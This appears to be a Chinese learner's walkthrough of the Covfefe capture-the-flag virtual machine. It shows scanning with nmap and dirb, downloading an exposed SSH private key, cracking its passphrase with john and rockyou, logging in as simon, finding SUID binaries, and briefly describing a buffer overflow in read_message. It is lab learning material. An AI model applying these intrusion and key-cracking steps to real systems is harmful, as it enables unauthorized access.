靶机下载、安装
用VMWare加入即可
扫描 靶机的IP
打开kali
使用工具netdiscover
注意:这里扫描不到本机kali的的IP
netdiscover
这里靶机的IP为192.168.31.76,浏览器进入之后发现没有什么东西
扫描 靶机的端口
使用nmap工具
nmap -sV 192.168.31.76
浏览器直接进入没有东西
找出隐藏文件
使用工具dirb,找出隐藏文件
类似”御剑”
dirb http://192.168.31.76:31337
.bash_history
、.bashrc
、.profile
三个文件都为系统的文件,不用理
打开robots.txt
有个taxes目录可以进入
得到了第一个flag
http://192.168.31.76:31337/taxes/
Good job! Here is a flag: flag1{make_america_great_again}
剩下一个.ssh文件 打开后发现密钥、公钥、对比文件
下载私钥文件
敲下面的网址就下载了私钥和对比文件
http://192.168.31.76:31337/.ssh/id_rsa
http://192.168.31.76:31337/.ssh/authorized_keys
(;´д`)ゞ悲剧的是 下载后打开发现加密了
*暴力破解加密的私钥文件
这里就要用到破解工具辣 ——john
由于没有配置john的环境变量,现直接进文件夹用
对了,还需要设置id_rsa的权限
文件路径/usr/share/john
我们需要的是这个ssh2john.py
脚本将ssh文件转换为john的格式
chmod 700 id_rsa
cd /usr/share/john
python ssh2john.py ~/id_rsa > ~/john_rsa
回到家目录 cd ~/
zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules john_rsa
这里有个zcat
工具,作用为显示压缩包中文件的内容,这里就是字典
远程连接
使用ssh命令进行远程连接
ssh -i id_rsa root@192.168.31.76
但是这里进不去 (;´д`)ゞ
其实不是这个用户名,在authorized_keys里面
有个simon@covfefe
应该是用户名的格式
ssh -i id_rsa simon@192.168.31.76
成功进入!!!!!!!!!!
乌拉!!!!!
*找其余flag 找出本用户有权读取的文件
列出本用户可以访问的文件,并且不显示错误信息
find / -perm -4000 2>/dev/null
read_message
打开read_message文件
根据文件提示进入到root目录下
查看flag文件但无权
*分析一个c语言程序
分析之后发现第二个flag,以及发现存在溢出问题
在chat buf[20]
处
*溢出处编写执行代码
通过溢出代码访问到加权文件
超过20个字符
整理
上面步骤中带*号的都是我的知识盲区 ( ̄▽ ̄)"
几款工具:
- netdiscover
- nmap
- dirb
- john
- zcat
- ssh
参考视频:(B站的)